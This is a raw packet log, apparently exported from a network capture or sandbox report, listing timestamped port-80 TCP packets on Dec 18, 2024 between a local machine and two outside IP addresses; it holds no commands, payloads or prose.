                                                                    Dec 18, 2024 09:13:07.368731022 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.368778944 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.368846893 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.369127035 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.369229078 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.369251966 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.370080948 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.370156050 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.370227098 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.370937109 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.371005058 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.371227980 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.371371984 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.371442080 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.372211933 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.372314930 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.372369051 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.373122931 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.373234034 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.373286963 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.374022007 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.374218941 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.374269962 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.374943018 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.375026941 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.375137091 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.375929117 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.376019001 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.376075029 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.377098083 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.377273083 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.377322912 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.378120899 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.378309011 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.378586054 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.378654003 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.378854990 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.378911972 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.379625082 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.379720926 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.379770994 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.380503893 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.380677938 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.380798101 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.381519079 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.381536007 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.381603003 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.382364035 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.382466078 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.382513046 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.383366108 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.383574009 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.383620977 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.384244919 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.384655952 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.384705067 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.385186911 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.385262012 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.385308027 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.386099100 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.386154890 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.386483908 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.387108088 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.387208939 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.387334108 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.388009071 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.388078928 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.388144970 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.389508963 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.389797926 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:07.390064001 CET4970780192.168.2.5147.45.49.155
                                                                    Dec 18, 2024 09:13:07.390439987 CET8049707147.45.49.155192.168.2.5
                                                                    Dec 18, 2024 09:13:14.750247955 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.750299931 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.750382900 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.752805948 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.752890110 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.752959967 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.755433083 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.755503893 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.755742073 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.758043051 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.758188963 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.758373022 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.760622978 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.760746002 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.760816097 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.763269901 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.763370037 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.763452053 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.765786886 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.766079903 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.766143084 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.768415928 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.768606901 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.768673897 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.771011114 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.771171093 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.771291971 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.773610115 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.773699045 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.773824930 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.776258945 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.776304960 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.776421070 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.778815031 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.778923035 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.779087067 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.781418085 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.781505108 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.781608105 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.783997059 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.784116030 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.784276009 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.786586046 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.786808968 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.786864996 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.789208889 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.789263010 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.789323092 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.791840076 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.791874886 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.791939974 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.794477940 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.794523954 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.794609070 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.797002077 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.797107935 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.797245979 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.799689054 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.799715996 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.799773932 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.802349091 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.802387953 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.802673101 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.804850101 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.804913998 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.804964066 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.807439089 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.807554007 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.807730913 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.810045958 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.810152054 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.810390949 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.812616110 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.812743902 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.812803984 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.815228939 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.815412045 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.815504074 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.817873001 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.817972898 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.818030119 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.820468903 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.820544004 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.820605040 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.823059082 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.823173046 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.823250055 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.825635910 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.825726032 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.825783014 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.828231096 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.828326941 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.828386068 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.830846071 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.830970049 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.831104994 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.833537102 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.833653927 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.833843946 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.836039066 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.836103916 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.836429119 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.838684082 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.838799953 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.838861942 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.841478109 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.841563940 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.841626883 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.843858957 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.843947887 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.844005108 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.846451998 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.846595049 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.846682072 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.849036932 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.849169016 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.849253893 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.851757050 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.851813078 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.851881027 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.854228973 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.923727989 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.923800945 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.923842907 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.924645901 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.924700022 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.924721956 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.926459074 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.926513910 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.926564932 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.928196907 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.928261042 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.928296089 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.929929018 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.929992914 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.930057049 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.932019949 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.932087898 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.932137966 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.933428049 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.933480024 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.933528900 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.935190916 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.935249090 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.935308933 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.936978102 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.937053919 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.937287092 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.938570976 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.938640118 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.938673973 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.940464973 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.940525055 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.940545082 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.941952944 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.942020893 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.942025900 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.943588972 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.943645000 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.943746090 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.945255041 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.945333958 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.945337057 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.946912050 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.946990967 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.946993113 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.948508024 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.948560953 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.948648930 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.950089931 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.950135946 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.950180054 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.951791048 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.951850891 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.951855898 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.953303099 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.953372955 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.953377008 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.955152035 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.955195904 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.955210924 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.956445932 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.956496954 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.956561089 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.958224058 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.958281994 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.958339930 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.959589005 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.959676981 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.959713936 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.961177111 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.961247921 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.961275101 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.962671995 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.962730885 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.962863922 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.964442015 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.964505911 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.964540005 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.965277910 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.965315104 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.965352058 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.966048956 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.966105938 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:14.966114998 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:14.966952085 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.306022882 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.306025028 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.306265116 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.306344032 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.306364059 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.307090044 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.307148933 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.307380915 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.307554960 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.307836056 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.308182955 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.308306932 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.308535099 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.308980942 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.309089899 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.309135914 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.309792042 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.309890985 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.309941053 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.310631037 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.310862064 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.310910940 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.311424971 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.311527967 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.311575890 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.312227011 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.312351942 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.312405109 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.313021898 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.313133955 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.313211918 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.313810110 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.313966990 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.314016104 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.314629078 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.314778090 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.314826965 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.315418959 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.315571070 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.315841913 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.316241026 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.316385984 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.316436052 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.317054987 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.317169905 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.317282915 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.317864895 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.317981958 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.318054914 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.318761110 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.318836927 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.318885088 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.319463015 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.319618940 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.319668055 CET4971680192.168.2.5139.99.188.124
